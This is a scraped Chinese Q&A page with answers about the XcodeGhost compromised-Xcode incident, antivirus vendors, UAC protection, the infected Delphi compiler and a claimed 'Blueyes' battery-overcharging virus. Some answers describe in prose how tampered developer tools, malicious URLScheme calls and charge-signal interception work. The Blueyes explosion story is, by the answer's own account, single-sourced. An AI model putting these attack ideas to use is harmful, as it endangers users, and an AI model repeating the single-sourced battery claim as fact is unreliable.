2015年全年人工审核拦截下的恶意木马病毒达到5万多个,能逃脱人工审核和人工查杀的只是极端个例。对此类非法行为,360已加强监管措施,遵循“实名认证+技术检测+用户举报”的基本原则,通过多重审核、人工分析、定期回查等措施杜绝此类事件的再次发生。&br&&br&如果两件事情有关联的话,那就是内外勾结,利用制度漏洞,制作可以躲过防病毒软件的病毒木马。
我没看到这一期《经济与法》,不过根据我对防病毒行业和技术的了解,可以来推断一下事情的经过和原因。个人认为题主说的并不太准确,不是木马病毒交钱就可以免杀,而是第三方可以去向360提交“自己开发的程序”或者申诉“自己的程序被误杀”,然后通过某个…
来自子话题:
分享一篇迅雷投毒简单测试:&a href=&///?target=http%3A//gold.xitu.io/entry/56023eabddb263b560c8d254& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&gold.xitu.io/entry/5602&/span&&span class=&invisible&&3eabddb263b560c8d254&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
分享一篇迅雷投毒简单测试:
来自子话题:
&b&&u&请诸位务必给自己的apple ID添加两步验证,并且不要和他人公用你们的apple ID&/u&&/b&&br&&b&&u&请诸位不要相信那个所谓的作者的澄清,完全就是欲盖弥彰,转移视线,姑且不谈他这一次获得了多少用户的信息,光是他带来的这种新的思路,并且成功的进行了尝试,就足够定性为是一种犯罪行为了。&br&&/u&&/b&&br&这个事件的发生,对于广大用户而言,是一场还没有看到结果的灾难,无论你是否是非越狱用户,无论你是否只从apple store下载APP,问题都如影随形,这不是危言耸听。&br&过去Mac OS也好,iOS也好都是相对比较小众的环境,当然随着苹果手机用户的使用量增加,移动支付和移动互动联网的发展,iOS已经成为了众多不法之徒眼中的香饽饽。&br&过去的病毒形式只是简单的寻找&i&&u&愚蠢的用户&/u&,&/i&而这次的xcode ghost则走了一条完全不同的路线,他寻找&i&&u&愚蠢的守护者&/u&,&/i&这就包括了APP的开发者,APP的审核者。&br&&br&&br&由于整个事件截止到目前为止,还只是在APP里发现了后门,并没有用户实际损失的报告。&br&从损失的角度来讲并没有什么,估计要有阵子才能看到这一次的实际损失有多大。&br&但是,对关键就是但是&br&这是一个分水岭。&br&过去的病毒,需要用户把带着病毒代码的程序安装到目标机器上,需要欺骗用户,而苹果提供了一个非常简单的应对措施,那就是闭环。也就是说,除了越狱的用户,只要你乖乖按照苹果说的做,你就是非常安全的。苹果为你建立了一个坚固的堡垒。&br&而这次XCODE GHOST的作者彻底粉碎了苹果的美梦,它给所有在堡垒外的野兽们提供了一条全新的思路,你不再需要费尽心思去欺骗审核人员,欺骗用户,你只需要收买一个拥有通行证的APP就行了,收买的方法就是给他们加个小尾巴,带着病毒,从大门,正正堂堂的走进去。&br&这,是有毁灭意义的。&br&作为曾经的一名IT行业从业者,信息安全的爱好者,我很佩服这个想法的提出者和实践者的智慧,但是我也很害怕,这么多血腥气散发出去,苹果,乃至整个移动互联网要遭受怎样的打击。&br&----------------------------------------------------------------------------------------------------------&br&说些私心话,我希望如果始作俑者或者相关公司团队被查到的话,能够被逮捕,被判刑,最好一辈子都不要放出来,他们的行为不仅仅是一次信息安全的攻防战,他们给所有有着不良想法的人提供了一个无限可能的方案,这种影响短时间是无法消除的,这不仅仅会影响苹果的生态链,对整个中国的互联网所能造成的伤害都是无法估计的。&br&-----------------------------------------------------------------------------------------------------------------&br&看到所谓的始作俑者的澄清,我只想说,呵呵。&br&挑起了一场战争,然后说自己是无心之举,那么倒是想请他解释一下,为什么要掩盖自己的踪迹,为什么要创建一个名字非常有迷惑性的网站,为什么要获取尝试获取用户的信息,为什么在明知道国内开发者的现状和弱点还非挑着这个弱点处心积虑的去宣传自己篡改过的开发工具?&br&无心之举,仅仅是做个实验,这种借口真的屁用都没有&br&-----------------------------------------------------------------------------------------------------------&br&苹果安卓微软三大家全部中招,无一幸免,我真不知道之前还在为这个作者洗地的那些人脑子里都在想什么,这么有组织有预谋不留痕迹的行为,还说自己无意为之。&br&&b&在此提醒各位用户,勤改密码,不要和他人共享你的账户&/b&
请诸位务必给自己的apple ID添加两步验证,并且不要和他人公用你们的apple ID请诸位不要相信那个所谓的作者的澄清,完全就是欲盖弥彰,转移视线,姑且不谈他这一次获得了多少用户的信息,光是他带来的这种新的思路,并且成功的进行了尝试,就足够定性为是一…
&blockquote&我记得近十年前的时候,平时上网即使装着杀毒软件动不动就中毒中木马&/blockquote&这是因为十年前的主流操作系统 Windows XP 安全性很差。&br&&blockquote&现在完全靠win8默认的Windows defender也从没出过问题。&/blockquote&这是因为 Windows 8 的安全性很好。&br&&blockquote&这种变化是客观存在的还是我的错觉?&br&&/blockquote&这种变化是客观存在的。&br&&blockquote&又是什么原因改变了网络环境了呢?&/blockquote&所以这主要不是网络环境的变化,是系统环境的变化。
我记得近十年前的时候,平时上网即使装着杀毒软件动不动就中毒中木马这是因为十年前的主流操作系统 Windows XP 安全性很差。现在完全靠win8默认的Windows defender也从没出过问题。这是因为 Windows 8 的安全性很好。这种变化是客观存在的还是我的错觉?这…
瑞星最成功的产品是“瑞星小狮子”,这是对一个不思进取的传统型杀毒安全企业最大的讽刺:&br&&img src=&/d2edaea356fe2487cfb8_b.jpg& data-rawwidth=&277& data-rawheight=&257& class=&content_image& width=&277&&&img src=&/bea22ec5849_b.jpg& data-rawwidth=&672& data-rawheight=&646& class=&origin_image zh-lightbox-thumb& width=&672& data-original=&/bea22ec5849_r.jpg&&
瑞星最成功的产品是“瑞星小狮子”,这是对一个不思进取的传统型杀毒安全企业最大的讽刺:
来自子话题:
VS2010以上版本反正是不能装在XP上面的了。&br&&br&只要你把VS装进C:\Program Files下面,然后打开UAC,可以保证病毒在修改VS的文件的时候要先征得你的同意,你可以根据需要来决定是否运行这个病毒。不过就算病毒运行了也不一定会成功的,因为VS的重要的文件都是有签名的,而且只要你不用命令行改配置,标记为需要签名的exe将无法加载没有签名的dll,而且.net framework的所有文件也是都签了名的。&br&&br&当你安装VS的时候,如果打开了UAC,这个时候VS要是被改了,UAC会变黄告诉你这个程序没有签名。如果百度改了VS他会告诉你这个VS是百度发行的。你可以根据需要来决定是否运行这个来历不明的安装程序。&br&&br&总之,在Windows7以及更新的系统,只要你开了UAC,并且正常的软件都不要给admin权限运行(VS的话也只有调试那些非得运行在admin的程序才需要用admin来启动VS),那任何病毒要运行之前都得先经过你的同意。当然了,你总是可以根据具体的需要,来决定是否运行病毒。&br&&br&不过操作系统总是不可避免的会有漏洞的。所以开了UAC虽然99%的情况下都安全了,但是还有那1%。不过解决方法很简单,只要你的开发机上只安装跟开发有关的东西,特别是不安装任何国产程序的话,那肯定是安全的。当然了,客户就是上帝,你总是可以根据具体的需要,来决定是否使用admin来安装三大全家桶的。
VS2010以上版本反正是不能装在XP上面的了。只要你把VS装进C:\Program Files下面,然后打开UAC,可以保证病毒在修改VS的文件的时候要先征得你的同意,你可以根据需要来决定是否运行这个病毒。不过就算病毒运行了也不一定会成功的,因为VS的重要的文件都是有…
来自子话题:
混淆视听的声明,是一个恶意软件和后门,分析见 &a href=&///?target=http%3A//mp./s%3F__biz%3DMzIwMTI4Nzk5Ng%3D%3D%26mid%3Didx%3D1%26sn%3D109d3415aa95bbb7ca80c%26scene%3D0%23rd& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&mp./s?&/span&&span class=&invisible&&__biz=MzIwMTI4Nzk5Ng==&mid=&idx=1&sn=109d3415aa95bbb7ca80c&scene=0#rd&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&摘录一段:&br&&br&&p&&strong&6.&/strong& 在@Saic的提示下我们发现受感染的app还拥有接收黑客在云端的命令并按照黑客的指令发送URLScheme的能力:&br&&/p&&p&URLScheme是iOS系统中为了方便app之间互相调用而设计的。你可以通过一个类似URL的链接,通过系统的Openurl来打开另一个应用,并可以传递一些参数。一个恶意的app通过发送URLScheme能干什么呢?&br&&/p&&p&&1&.可以和safari进行通讯打开钓鱼网站。&/p&&p&&2&.可以和AppStore进行通讯诱导用户下载其他AppStore应用。&/p&&p&&3&.可以和itms-services服务通讯诱导用户下载无需AppStore审核的企业应用。&/p&&p&&4&.向支付平台通讯发送欺骗性的支付请求等。&/p&
混淆视听的声明,是一个恶意软件和后门,分析见 摘录一段:6. 在@Saic的提示下我们发现受感染的app还拥有接收黑客在云端的命令并按照黑客的指令发送URLScheme的能力:URLScheme是iOS系统中为了方便app之间互相调用而设计的。你可以通过…
来自子话题:
下载速度慢是国内的原因,我一直以来尝试各种办法来实验。&br&&br&改 DNS 是一种简单易行的办法,但是有效率不高,而且我通常不太相信那些不知来路的 DNS。&br&&br&目前我使用的方法:&br&&br&首先你最好有个大陆区账户。当你下载 Xcode,OS X 这种危险性较大的 App 时,这个账户可以派上用场。首先挂着一种你信赖的那种工具登录账户,找到你要下载的东西,点击 Download,等到开始下载后,点击 Suspend 然后断掉那种工具,刷一下 DNS 缓存,然后点击 Continue,这时你就可以被导到国内的 CDN 上了,几本就是满速。&br&&br&以上方法,我用北京联通,北京宽带通 (联通),北京电信多个网络测试过,屡试不爽,&br&&br&目前我宽带是电信 50M,以上方法下载 EI Capitan,Xcode 等等,都是 7MB/s。我很满意,
下载速度慢是国内的原因,我一直以来尝试各种办法来实验。改 DNS 是一种简单易行的办法,但是有效率不高,而且我通常不太相信那些不知来路的 DNS。目前我使用的方法:首先你最好有个大陆区账户。当你下载 Xcode,OS X 这种危险性较大的 App 时,这个账户可…
来自子话题:
&p&应该判刑呀,随便一条都够判个几年的了。&br& 这样如果都不判,那以后大家还不肆无忌惮的种各种木马了?互联网上所有人都可以有恃无恐的黑别人了。现在连网上下个东西都要当心下到木马,这个人不处理,不知道以后还会下到些什么。&br&&br&&/p&&p&随便说两个案例,虽然有点不一样,但是做法都很类似,基本上是判三年:&/p&&p&&a href=&///?target=http%3A///archives/1280.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&珊瑚虫QQ作者被判入狱三年罚款120万元&i class=&icon-external&&&/i&&/a&&/p&&p&&br&&a href=&///?target=http%3A///a/283.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&番茄花园案一审宣判:洪磊判刑三年半罚100万_IT新闻&i class=&icon-external&&&/i&&/a&&/p&&br&&p&刚跑到作者 github 主页上劝其自首了。&/p&&p&&a href=&///?target=https%3A///XcodeGhostSource/XcodeGhost/issues/52& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&应该判刑 · Issue #52 · XcodeGhostSource/XcodeGhost · GitHub&i class=&icon-external&&&/i&&/a&&/p&
应该判刑呀,随便一条都够判个几年的了。 这样如果都不判,那以后大家还不肆无忌惮的种各种木马了?互联网上所有人都可以有恃无恐的黑别人了。现在连网上下个东西都要当心下到木马,这个人不处理,不知道以后还会下到些什么。随便说两个案例,虽然有点不一…
记得以前带病毒的Delphi么,和那个能做到的事情差不多,不过那个Delphi sysconst.dcu病毒感染的目标是Delphi本身&br&据分析,这次的病毒和之前的假冒越狱插件盗取Apple ID的病毒使用了相同的控制服务器域名,有可能是同一个黑产团体做的&br&&a href=&///?target=http%3A//www./threat-centre/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A///2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia&i class=&icon-external&&&/i&&/a&&br&&br&XCode至少在国内下载除了速度慢并没有硬性的障碍,而细思恐极的是,Android Studio、Android SDK在国内因为众所周知的原因难以从官方下载,如果黑产团体放出针对它们的编译器病毒,然后在国内提供篡改过的镜像下载,那就可能有非常大的危险了。&br&&br&
我们关心这个问题的人自然清楚这之间的危险性,我们会搭梯子,会校验数字签名和HASH,但是也许有一些开发流行应用的开发者并不清楚。&br&&br&分隔线&br&&br&其实那个带病毒的delphi由于病毒可以看到源码,有人改过它的加强版,比如定期删除硬盘里的.pas文件的,把.pas文件打包发邮件的
记得以前带病毒的Delphi么,和那个能做到的事情差不多,不过那个Delphi sysconst.dcu病毒感染的目标是Delphi本身据分析,这次的病毒和之前的假冒越狱插件盗取Apple ID的病毒使用了相同的控制服务器域名,有可能是同一个黑产团体做的
都说CIH这种远古时代的东西,还是说下近代的吧。&br&2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,&b&轻则烧毁,重则爆炸&/b&,这才是真的物理攻击。&br&对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。&br&&br&~~~~~~~~~~~~~~~~~~&br&补充:&br&Blueyes的相关报道很少,并且几乎都是单一来源,估计是因为中毒的电脑要么没事(因为不同笔记本的电池控制可能有差异,通用性没法保证),要么毁了,并且没人怀疑和病毒有关。&br&原理很简单,充电结束后,充电电路会送回一个相应的消息,然后控制软件发出控制信号进入浮充模式,病毒截获充电结束的消息,然后不断发出快速充电的控制信号,然后就坐等电池烧毁吧。&br&由于这病毒长相很正常,杀毒软件和防火墙一般很难发现。&br&当然要防范很简单,如果充电电路有硬件保护,满电后无视任何要求继续充电的信号,那任何软件都没办法的。&br&&img src=&/ee9a94eb17e59bf292e87_b.jpg& data-rawwidth=&650& data-rawheight=&520& class=&origin_image zh-lightbox-thumb& width=&650& data-original=&/ee9a94eb17e59bf292e87_r.jpg&&(笔记本电池爆炸效果图,来自网络,和病毒无关)
都说CIH这种远古时代的东西,还是说下近代的吧。2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,轻则烧毁,重则爆炸,这才是真的物理攻击。对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。~…
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
已有帐号?
无法登录?
社交帐号登录}
我要回帖
更多推荐
- ·学前教育一般原则是什么的技巧?
- ·国产最好的羊奶粉婴幼儿羊奶有推荐的吗?
- ·怎么给宝宝选什么牌的羊奶粉比较好?
- ·宝宝大便干硬吃什么好,如何缓解?
- ·对于二胎想要男孩怎样备孕快速怀男孩的方法,有没有一些科学或传统的建议?
- ·13411843024现在还有win7使用耳机还有外音吗
- ·风行电视43寸评测43有2个型号吗
- ·我想知道苹果ipad最小型的价格请告诉我 辣妹子酱
- ·如何取消支付宝账号可以取消吗。联系人出现两个联系人。怎么取消。
- ·谁能不给我个智能手机性价比排行
- ·照相杆为啥oppoR1oppo手机 照相机设置不能用??
- ·手机上网慢该怎么设置如何设置
- ·手机型号是bird波导l108刷机教程没有遇到过root.,和root配不了
- ·大朗镇哪里有卖糖猫儿童智能手表表的
- ·为啥临川区的魅族599元魅蓝2卖899? 不是599吗
- ·索尼笔记本屏幕电脑屏幕起气泡是怎么回事?
- ·现在谁可以陪我打王者荣耀排位不掉方法吗?,安卓Q142区,白银三
- ·苹果6S短信息怎么苹果6s plus没有声音音?
- ·求大神出处,给出处,,
- ·ling win X-apple keyboard win7M 09手机多少钱?
- ·有海尔滚筒洗衣机洗衣机dx12636这个型号的机器吗
- ·金立天鉴w909o9保护套
- ·苹果哪款处理器A系列的可以打败haswell架构处理器哪款处理器???不允许1971年的回答
- ·三星手机链接电脑驱动s6000怎么链接电脑
- ·问:iPhone 6的主屏幕怎么样跟iPad一样屏幕ipad如何自动旋转屏幕呢?
- ·5s升级ios9.2.1没有4g成9.3.1后没有4G了
- ·这几四张图片怎么排版好看那张P的好看些?
- ·苹果手机如何刷机?
- ·大家好本人昨天买了一台苹果手机6s在朋友那里拿的!45886s你不知道的功能是真是假!苹果手机列号码是!355
- ·三星有kto96h这款keditec平板打印机电脑吗
- ·手机百度的百度网盘 新版本0的管路卡片在哪呢
- ·汽车汽车音响低音炮报价上写的LiGHT是什么牌子音响
- ·什么root软件可以给letvx500多少钱受权
- ·生命是自然界时间是最宝贵的财富富,世界因生命的存在而精彩动人。我们应该树立的生态
